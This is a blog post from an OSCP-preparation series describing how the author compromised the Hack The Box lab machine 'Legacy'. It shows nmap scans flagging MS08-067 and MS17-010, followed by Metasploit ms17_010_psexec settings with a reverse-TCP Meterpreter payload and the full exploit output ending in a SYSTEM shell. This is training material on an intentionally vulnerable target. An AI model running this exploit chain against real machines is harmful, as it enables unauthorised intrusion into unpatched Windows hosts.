Path to OSCP: Legacy

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Another quick and straightforward box, Legacy. We kick off nmap:

u01@nostromo:~$ sudo nmap -p- -A legacy.htb -oA nmapScans/legacy
[sudo] password for u01: 
Starting Nmap 7.94 ( ) at 2023-08-16 04:28 EDT
Nmap scan report for legacy.htb (
Host is up (0.029s latency).
Not shown: 65532 closed tcp ports (reset)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open 6D~vU Windows XP microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:d8:9b (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2023-08-21T13:27:16+03:00
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s

TRACEROUTE (using port 1723/tcp)
1 46.68 ms
2 46.76 ms legacy.htb (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 55.20 seconds

As with Blue, we’re clearly looking at an SMB exploit. I try to connect in with smbclient, but don’t appear to be able to authenticate or enumerate shares in any way. I kick off a nmap smb vulnerability scripts:

u01@nostromo:~$ nmap --script smb-vuln* -Pn -p 139,445 legacy.htb
Starting Nmap 7.94 ( ) at 2023-08-16 04:44 EDT
Nmap scan report for legacy.htb (
Host is up (0.033s latency).

139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067: 
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| Disclosure date: 2008-10-23
| References:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| Disclosure date: 2017-03-14
| References:

Nmap done: 1 IP address (1 host up) scanned in 5.16 seconds

We get a hit for two potential vulnerabilities:

CVE-2008-4250 –
CVE-2017-0143 –

Since this box is so similar to Blue, no point in hanging around. Initially attempting the same Metasploit module results in an error, since the module does not have a 32-bit payload. Instead, we use ms17_010_psexec:

msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/word yes List of named pipes to check
RHOSTS legacy.htb yes The target host(s), see
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal r
ead/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic

As with Blue, we get an easy system shell to find user and root flags:

msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 
[*] - Target OS: Windows 5.1
[*] - Filling barrel with fish... done
[*] - <---------------- | Entering Danger Zone | ---------------->
[*] - [*] Preparing dynamite...
[*] - [*] Trying stick 1 (x86)...Boom!
[*] - [+] Successfully Leaked Transaction!
[*] - [+] Successfully caught Fish-in-a-barrel
[*] - <---------------- | Leaving Danger Zone | ---------------->
[*] - Reading from CONNECTION struct at: 0x863b1a90
[*] - Built a write-what-where primitive...
[+] - Overwrite complete... SYSTEM session obtained!
[*] - Selecting native target
[*] - Uploading payload... ktBtJJhj.exe
[*] - Created \ktBtJJhj.exe...
[+] - Service started successfully...
[*] - Deleting \ktBtJJhj.exe...
[*] Sending stage (175686 bytes) to
[*] Meterpreter session 2 opened ( -> at 2023-08-16 16:43:45 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

I again decided to hold off on investigating manual exploitation of CVE-2008-4250. It’s on my to-do list, but at the moment I really want to crack through and complete the 15 or so previously-pwned boxes on my list. Onward!

Leave a Reply

Your email address will not be published. Required fields are marked *